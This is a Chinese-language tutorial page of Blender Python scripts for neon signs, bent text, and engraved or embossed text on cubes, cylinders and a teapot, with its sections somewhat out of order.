    1. 形成浮雕有一个简单的方法:ObjectJoin

    png

    1. 如果不用 Join,改用 Boolean 运算:

    png

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj
    1. 添加 Bevel 使得斜角效果:

    png

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True
    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 如果有破,只能自己拿工具填边了:

    png


    完整代码:

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.size = 0.5

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15

    bpy.ops.object.convert(target="MESH")

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    Neon Light or Neon Sign In Blender | Easy & Realistic Method For Blender Eevee (All Versions)

    1. 新建一个 Text 对象,调整其参数:

    png

    png

    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2
    1. 修改文字:

    png

    text_obj.data.body = "BARBEQUE\nNATION"
    1. Neon Future Font | dafont.com 找一个适合霓虹灯的字体,应用之:

    png

    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)
    1. 设置 extrude

    png

    text_obj.data.extrude = 0.02
    1. 添加一个 emission 的材质,设置参数:

    png

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)
    1. 设置 scene 里的 Bloom

    png

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25
    1. 新建一个 plane,用于接受霓虹灯的光线:

    png

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25
    1. 从网上找一张贴图,给这个 plane 一个贴图的纹理:

    png

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))
    1. 调整其 shader nodes,翻转贴图:

    png

    png

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)
    1. 添加环境光探针,大小包围平面和文字:

    png

    bpy.ops.object.lightprobe_add(type="GRID")
    1. 将 Light Probe 的大小包围屏幕和文字:

    png

    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]
    1. Bake Cubemap Only

    png

    1. 调低背景亮度,Screen Space Reflections

    png

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True
    1. 添加点光源,补充亮度:

    png

    png

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5

    完整代码:

    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2

    text_obj.data.extrude = 0.02

    text_obj.data.body = "BARBEQUE\nNATION"
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)

    bpy.ops.object.lightprobe_add(type="GRID")
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5
    ]]>
+ Resources

Courses

Installing bpy on Linux

Download a prebuilt wheel from Releases · TylerGubala/blenderpy (github.com), then:

pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install
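A quick sanity check after installation (a minimal sketch; the exact version string depends on the wheel you installed):

import bpy

# Should print something like "2.91.0" if the module imports correctly
print(bpy.app.version_string)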

Create Curved Text In Blender | Bend Any Text | Part 1 in Text Effects | Two Easy Methods Explained

Creating the text object

1. Create a Text object:

import bpy

bpy.ops.object.text_add()
text_obj = bpy.context.object

2. Set the Text object's Rotation X and Z to 90°:

import numpy as np

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

3. Center-align the text:

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

4. Set the Text object's Geometry → Extrude to 0.1 m so it has thickness.

text_obj.data.extrude = 0.1

5. Switch to Edit Mode to change the text content.

text_obj.data.body = "Hello,\nWorld!"

Bending directly

1. Add a Simple Deform modifier to the Text object:

text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

2. Set its properties:

text_modifier.deform_method = "BEND"
text_modifier.deform_axis = "Z"
text_modifier.angle = np.pi / 4

This produces the bent text.

Complete code:

import bpy
import numpy as np

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.extrude = 0.1

text_obj.data.body = "Hello,\nWorld!"

text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

text_modifier.deform_method = "BEND"
text_modifier.deform_axis = "Z"
text_modifier.angle = np.pi / 4
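Rotation and bend angles in bpy are radians; spelling the conversion out keeps the intent visible (identical in value to the π/4 above):

# 45° expressed explicitly -- same value as np.pi / 4
text_modifier.angle = np.deg2rad(45)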

Bending along a Bezier curve

1. Add a Bezier Circle object and set its Rotation Z to 90°:

bpy.ops.curve.primitive_bezier_circle_add()
curve_obj = bpy.context.object

curve_obj.rotation_euler[2] = np.pi / 2

2. Add a modifier to the Text object, choose Curve, then pick the BezierCircle object created above:

curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
curve_modifier.object = curve_obj

The Text object now deforms along the BezierCircle curve.

3. Select the BezierCircle object, switch to Edit Mode, and choose Segments → Switch Direction to flip the direction of the text:

bpy.ops.object.editmode_toggle()
bpy.ops.curve.switch_direction()
bpy.ops.object.editmode_toggle()

4. Change the BezierCircle's Scale and the Text object follows:

curve_obj.delta_scale[0:3] = [2, 2, 2]

Complete code:

import bpy
import numpy as np

# Create a TextCurve object
bpy.ops.object.text_add()
text_obj = bpy.context.object

# Set the text rotation
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

# Center-align the text
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

# Extrude the text
text_obj.data.extrude = 0.1

# Set the text content
text_obj.data.body = "Hello,\nWorld!"

# Create a circle object
bpy.ops.curve.primitive_bezier_circle_add()
curve_obj = bpy.context.object

# Rotate the circle
curve_obj.rotation_euler[2] = np.pi / 2

# Deform the text along the circle
curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
curve_modifier.object = curve_obj

# Flip the direction
bpy.ops.object.editmode_toggle()
bpy.ops.curve.switch_direction()
bpy.ops.object.editmode_toggle()

# Resize the circle
curve_obj.delta_scale[0:3] = [2, 2, 2]
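The whole flow packs naturally into a reusable function. A minimal sketch under the same assumptions as above (the function name and parameters are illustrative):

def bend_text_along_circle(body="Hello,\nWorld!", radius_scale=2):
    # Create the text
    bpy.ops.object.text_add()
    text = bpy.context.object
    text.data.body = body
    # Create the guide circle
    bpy.ops.curve.primitive_bezier_circle_add()
    circle = bpy.context.object
    # Bind the text to the circle with a Curve modifier
    mod = text.modifiers.new(name="Curve", type="CURVE")
    mod.object = circle
    # delta_scale stacks on top of the regular scale, leaving scale untouched
    circle.delta_scale = (radius_scale,) * 3
    return text, circle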

Add Text To Any Curved Surface In Blender | Part 2 in Text Effects | Blender Eevee & Cycles

1. Create a teapot:

import bpy
import numpy as np

bpy.ops.mesh.primitive_teapot_add()
teapot_obj = bpy.context.object
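primitive_teapot_add is not in stock Blender; it ships with the bundled "Add Mesh: Extra Objects" add-on. A hedged sketch for enabling it from a script (the module name is my assumption about that add-on):

import addon_utils

# Enable the add-on that provides bpy.ops.mesh.primitive_teapot_add()
addon_utils.enable("add_mesh_extra_objects")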
2. Create a text object and set its alignment, location (close to the teapot surface), rotation, extrude, content, line spacing, and so on:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.location[1] = -2
text_obj.location[2] = 1.5

text_obj.rotation_euler[0] = np.pi / 2

text_obj.data.extrude = 0.1

text_obj.data.body = "Hello,\nWorld!"

text_obj.data.space_line = 0.75

3. Give the text object a red material; switching to the rendered viewport now shows the text in red:

text_material = bpy.data.materials.new(name="TextMaterial")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

text_obj.data.materials.append(text_material)

4. Create a Cube-type Empty at the same location as the Text and set its rotation; it acts as the origin that controls the Text's bend:

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[1] = -2
empty_obj.location[2] = 1.5

empty_obj.rotation_euler[0] = np.pi / 2
empty_obj.rotation_euler[2] = np.pi / 2

5. Add modifiers to the Text object (their stacking order matters; see the quick check after this list):
• Remesh: makes the font geometry compatible with the bend; choose Sharp and set Octree Depth to 8:

text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

• SimpleDeform: bends the text; choose Bend, set Origin to the Empty object, and Axis to Y:

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.deform_axis = "Y"

• Shrinkwrap: projects the text onto the teapot; set Wrap Method to Target Normal Project, Target to the Teapot object, and Offset to 0.1 m:

text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
text_modifier_shrink_wrap.target = teapot_obj
text_modifier_shrink_wrap.offset = 0.1
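Modifiers evaluate top to bottom, so Remesh must precede SimpleDeform, which must precede Shrinkwrap. A quick check of the stack order:

# Print the modifier stack; expected order: Remesh, SimpleDeform, Shrinkwrap
for m in text_obj.modifiers:
    print(m.name, m.type)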

Complete code:

import bpy
import numpy as np

# Create the teapot object
bpy.ops.mesh.primitive_teapot_add()
teapot_obj = bpy.context.object

# Create the text object
bpy.ops.object.text_add()
text_obj = bpy.context.object

# Center-align
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

# Set the location
text_obj.location[1] = -2
text_obj.location[2] = 1.5

# Set the rotation
text_obj.rotation_euler[0] = np.pi / 2

# Set the extrude depth
text_obj.data.extrude = 0.1

# Set the text content
text_obj.data.body = "Hello,\nWorld!"

# Set the line spacing
text_obj.data.space_line = 0.75

# Create the material
text_material = bpy.data.materials.new(name="TextMaterial")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

# Assign the material to the text
text_obj.data.materials.append(text_material)

# Create the empty object
bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

# Set the empty's location
empty_obj.location[1] = -2
empty_obj.location[2] = 1.5

# Set the empty's rotation
empty_obj.rotation_euler[0] = np.pi / 2
empty_obj.rotation_euler[2] = np.pi / 2

# Add the Remesh modifier
text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

# Add the SimpleDeform modifier
text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.deform_axis = "Y"

# Add the Shrinkwrap modifier
text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
text_modifier_shrink_wrap.target = teapot_obj
text_modifier_shrink_wrap.offset = 0.1

Engrave & Emboss Text Easily In Blender | Part 3 in Text Effects | Create 3D Text Logo In Blender

1. Create a Cube and adjust its Scale:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cube_add()
cube_obj = bpy.context.object

cube_obj.scale[0] = 1.5
cube_obj.scale[1] = 2.5

2. Create a Text and adjust its Transform:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[2] = 1.15
text_obj.rotation_euler[2] = np.pi / 2

Center-align it:

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Set the text content:

text_obj.data.body = "Hello,\nWorld!"

3. Once the text content is final, convert it to a Mesh; after that the content can no longer be edited!

bpy.ops.object.convert(target="MESH")

4. Apply a Decimate modifier to cut down the excess vertices:

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

5. In Edit Mode, select all vertices of the Text object, then Mesh → Merge → By Distance:

Enter 0.01 m in the dialog.

bpy.ops.object.editmode_toggle()
bpy.ops.mesh.select_all(action="SELECT")
bpy.ops.mesh.remove_doubles(threshold=0.01)

6. Mesh → Delete → Limited Dissolve:

Set Max Angle to 10° in the dialog.

bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
bpy.ops.object.editmode_toggle()
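angle_limit is in radians: np.pi / 18 is exactly 10°. The same call written so the degrees stay visible:

# 10° expressed explicitly -- identical to np.pi / 18
bpy.ops.mesh.dissolve_limited(angle_limit=np.radians(10))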
    1. Text 添加一个 Solidfy,使其具有高度:

    png

    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    1. Object Mode 下,给 TextCude 使用 Shade Smooth

    png

    png

    png

    1
    2
    3
    4
    5
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True
    1. Cude 添加 Boolean,关闭 Text 的显示,形成雕刻效果:

    png

    1
    2
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    1. Cude 添加 Bevel,形成斜角效果:

    png

    1
    2
    3
    4
    5
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True
    1. Boolean 改为 Union,形成浮雕效果:

    png

    1
    cube_modifier_boolean.operation = "UNION"

    emmmm 如果破了的话好像只能手动处理了。

    png


Complete code:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cube_add()
cube_obj = bpy.context.object

cube_obj.scale[0] = 1.5
cube_obj.scale[1] = 2.5

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[2] = 1.15
text_obj.rotation_euler[2] = np.pi / 2

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.body = "Hello,\nWorld!"

bpy.ops.object.convert(target="MESH")

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

bpy.ops.object.editmode_toggle()
bpy.ops.mesh.select_all(action="SELECT")
bpy.ops.mesh.remove_doubles(threshold=0.01)

bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
bpy.ops.object.editmode_toggle()

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cube_obj.data.use_auto_smooth = True

cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cube_modifier_boolean.object = text_obj

text_obj.hide_viewport = True
text_obj.hide_render = True

cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
cube_modifier_bevel.width = 0.005
cube_modifier_bevel.segments = 5
cube_modifier_bevel.use_clamp_overlap = False
cube_modifier_bevel.harden_normals = True

cube_modifier_boolean.operation = "UNION"
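Since Difference engraves and Union embosses on the same modifier, switching between the two effects is a one-line change. A small sketch over the objects defined above (the helper name is illustrative):

def set_relief(style):
    # "engrave" cuts the text in; anything else raises it out
    cube_modifier_boolean.operation = "DIFFERENCE" if style == "engrave" else "UNION"

set_relief("emboss")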

Engrave or Carve Text On Curved Surface | Part 4 in Text Effects | Blender Eevee & Cycles

1. Create a cylinder:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

Scale it up a little:

cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

Add an EdgeSplit modifier and apply it to split the edges:

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

Add a Subdivision modifier and apply it to smooth the body:

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")

2. Create a text object:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.22
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Load a font that contains the heart glyph and set the content, size, and line spacing:

text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
text_obj.data.body = "I❤\nYOU"

text_obj.data.size = 0.9
text_obj.data.space_line = 0.75
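The font path above is Windows-specific (Segoe UI Emoji). A hedged guard for running the script elsewhere; any installed font containing the ❤ glyph will do:

import os

font_file = "C:\\windows\\Fonts\\seguiemj.ttf"
# Only load the font when the platform actually has it
if os.path.exists(font_file):
    text_obj.data.font = bpy.data.fonts.load(font_file)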

Convert the text to a mesh:

bpy.ops.object.convert(target="MESH")

Apply a Decimate modifier to reduce the vertex count:

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

Add a Solidify modifier for thickness:

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2

Shade smooth:

bpy.ops.object.shade_smooth()
text_obj.data.use_auto_smooth = True

Create an Empty at the same location as the Text to drive the bend:

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

Bend the text with a SimpleDeform modifier:

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Y"

Carve the text into the cylinder with a Boolean modifier, then hide the text:

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.object = text_obj

text_obj.hide_viewport = True
text_obj.hide_render = True

Give the cylinder a material:

cylinder_material = bpy.data.materials.new(name="Material")
cylinder_material.use_nodes = True
nodes = cylinder_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

cylinder_obj.data.materials.append(cylinder_material)

Complete code:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.22
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
text_obj.data.body = "I❤\nYOU"

text_obj.data.size = 0.9
text_obj.data.space_line = 0.75

bpy.ops.object.convert(target="MESH")

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2

bpy.ops.object.shade_smooth()
text_obj.data.use_auto_smooth = True

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Y"

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.object = text_obj

text_obj.hide_viewport = True
text_obj.hide_render = True

cylinder_material = bpy.data.materials.new(name="Material")
cylinder_material.use_nodes = True
nodes = cylinder_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

cylinder_obj.data.materials.append(cylinder_material)

Emboss Any Text On Curved Surface | Bend Any Text | Part 5 in Text Effects | Blender Eevee & Cycles

1. Create a cylinder.

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

2. Add an EdgeSplit modifier and apply it to split the edges:

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

3. Add a Subdivision modifier and apply it to smooth the body:

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")

4. Create a Text and adjust its parameters:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.1
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

Set the text content:

text_obj.data.body = "Hello,\nWorld!"

Center-align it:

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Set the text size:

text_obj.data.size = 0.5

5. Add a Solidify modifier to extrude by 0.15 m:

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.15

6. Convert the Text to a Mesh:

bpy.ops.object.convert(target="MESH")

7. Remesh it:

